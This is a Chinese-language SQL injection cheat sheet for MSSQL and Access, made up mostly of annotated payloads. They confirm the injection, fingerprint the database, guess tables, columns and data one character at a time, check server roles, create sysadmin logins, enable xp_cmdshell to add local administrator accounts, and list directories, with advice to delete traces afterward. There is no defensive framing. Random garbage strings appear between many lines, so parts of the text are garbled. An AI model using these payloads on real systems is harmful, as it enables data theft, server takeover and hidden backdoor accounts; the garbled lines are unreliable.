1.判断是否有注入：分别提交 ;and 1=1 与 ;and 1=2 —— 前者页面应与原始请求一致，后者页面异常、为空或报错。两次响应必须有可观察的差异，才能说明附加条件真的被拼入了查询并执行；响应相同时要换参数或换判断方式，不能直接下结论。
2.初步判断是否是mssql：;and user>0 —— MSSQL 中 user 是 nvarchar 类型，与整数 0 比较会触发类型转换错误，错误信息里通常会带出当前数据库用户名（如 dbo）。此法依赖服务端把数据库报错回显到页面，关闭了详细错误的站点需改用第 5 步的系统表判断。
+zXcTT[V
3.注入参数是字符型时：'and [查询条件] and ''=' —— 开头的单引号先闭合原 SQL 中的字符串，末尾的 ''=' 与程序自动补上的结束引号拼成 ''='' （恒真），从而保持整条语句语法正确。
t<j_` %`8
4.搜索（LIKE 查询）框未过滤参数时：'and [查询条件] and '%25'=' —— %25 是 URL 编码后的 %，服务端解码后得到 '%'='%'，与原语句的 LIKE 通配符形式保持一致；直接写 % 可能被当成编码前缀而出错。
P]OUzI,
5.判断数据库系统（依据各自的系统表是否可查）
YLS*uXB&.
;and (select count(*) from sysobjects)>0 —— 成立则为 mssql（sysobjects 是 SQL Server 的系统表，普通登录默认可读）
t*dq*(3"c
;and (select count(*) from msysobjects)>0 —— 对应 access（MSysObjects 是 Jet/Access 的系统表；默认没有读取权限，Access 多半会直接报"没有读取数据权限"一类的错误，这个报错本身也可作为 Access 的判断依据）
rQJ\Y3.
Z3=N= xY]
V-E 77u6{0
6.猜表名（原文写作"数据库名"，实际猜的是表）：;and (select Count(*) from [表名])>0 —— 表存在时页面正常，不存在则报错或异常；用方括号包裹可避免表名与保留字冲突。
Mvp|S.
7.猜字段名：;and (select Count(字段名) from 表名)>0 —— 字段不存在时查询报错；注意 Count(字段名) 只统计非 NULL 行，若该列全为 NULL 结果为 0，条件为假，会误判为字段不存在。
'Sesh'2
/
8.猜字段中记录的长度：;and (select top 1 len(字段名) from 表名)>0 —— 逐步增大右侧数字（>1、>2、……或用二分法）直到条件为假，即可得出长度。top 1 未指定 order by 时取到的行不确定，多次请求可能落在不同记录上，应加 order by 或 where 锁定同一行。
C7f*Q[
9.(1)逐字符猜字段内容的 ASCII 值（access）
9XhH*tBn7(
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 —— mid 的第二个参数是字符位置（从 1 开始），asc 取该字符的编码；对右侧数字用 >、< 二分法缩小范围，每猜出一位就把位置加 1。
F,Ve, 7kh
(2)逐字符猜字段内容的编码值（mssql）
UoUQ6Ij
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 —— unicode() 返回的是字符的 Unicode 码位而非单字节 ASCII，因此中文等非 ASCII 字符也能猜出（范围要放宽到 65535）；同样需配合 order by 锁定行。
>_ G'o
10.测试当前登录的权限（mssql）—— 以下函数返回 1 表示是该角色成员，0 表示不是，NULL 表示角色名无效或当前上下文无法判断；只有 sysadmin 成立时第 11、12 步才有意义。
7%[ YX
.}uri1k"@k
c=QN!n:
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- （服务器级最高权限，可执行 xp_cmdshell、添加登录等）
Qpj[]c5
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ReL+V
T LF'7ufq
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Le{.B@2-"
atmW? Z
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- .:GOKyr(~
g/\cN(X
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- !H<%X~|,
q*C-DiV
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &FJr?hY%
\=`jo$S
;and 1=(select IS_MEMBER('db_owner'));-- （注意 IS_MEMBER 检查的是当前数据库内的数据库角色，与上面的服务器角色不同；db_owner 只能控制当前库，不等于 sysadmin）
]!N=Z
}LD
0\s&;@xKk
|[>yJXxEL@
11.添加 mssql 登录和操作系统帐户（前提：当前登录为 sysadmin，且注入点允许以 ; 分隔的堆叠查询；以下 sp_addlogin / sp_password / sp_addsrvrolemember 在新版 SQL Server 中均已标为弃用，替代写法为 CREATE LOGIN / ALTER LOGIN / ALTER SERVER ROLE ... ADD MEMBER）
}B!io-}
;exec master.dbo.sp_addlogin username;-- （创建 SQL 登录；新版本等价于 CREATE LOGIN username WITH PASSWORD='password'）
;exec master.dbo.sp_password null,username,password;-- （参数顺序为 旧密码,新密码,登录名，第一个参数为 null 表示不校验旧密码；新版本等价于 ALTER LOGIN username WITH PASSWORD='password'）
ls7P$qq
FC||6vJth
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- （参数顺序为 角色名,登录名；新版本等价于 ALTER SERVER ROLE sysadmin ADD MEMBER username）
[hk/Rp7{
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
（上面是一条完整语句，各 net user 开关之间必须有空格，原文 /workstations:*/times:all 缺少空格会导致命令失败。xp_cmdshell 自 SQL Server 2005 起默认禁用，需先以 sysadmin 执行 sp_configure 'show advanced options',1; reconfigure; sp_configure 'xp_cmdshell',1; reconfigure; 才能调用；命令以 SQL Server 服务帐户的身份运行，该帐户没有本地管理员权限时添加系统用户会失败。）
[tElt4uG
;exec master.dbo.xp_cmdshell 'net user username password /add';-- （上一条的简化形式，只创建本地用户）
x8~*+ j
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- （把该用户加入本地管理员组；非英文系统上组名可能不是 administrators，可改用 SID 或本地化组名）
OdNcuiLa
Zm7,O8
KmM:V2@A$
12.(1)遍历目录（借助 xp_dirtree 把目录名写入自建表，再逐行猜出；需要 sysadmin 与堆叠查询支持）
m6]6!_
;create table dirs(paths varchar(100), id int) （两列分别接收 xp_dirtree 返回的 subdirectory 和 depth；paths 列宽不足时 insert 会报截断错误，可按需加大）
'5~l{3Lw
;insert dirs exec master.dbo.xp_dirtree 'c:\' （不指定深度时会递归整个 c:\，数据量大且耗时；可写成 xp_dirtree 'c:\',1 只取一层）
'
I!/I
;and (select top 1 paths from dirs)>0 —— 把 varchar 与整数比较会触发类型转换错误，错误信息里直接带出第一条目录名（报错注入）；页面不回显错误时需改用第 9 步的逐字符猜解。
UI%4d3
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0 （原文末尾 >) 为笔误，应为 >0；每得到一个目录名就追加到 not in 列表里，直到没有新结果。遍历完成后执行 ;drop table dirs;-- 删掉自建表，减少留下的痕迹。）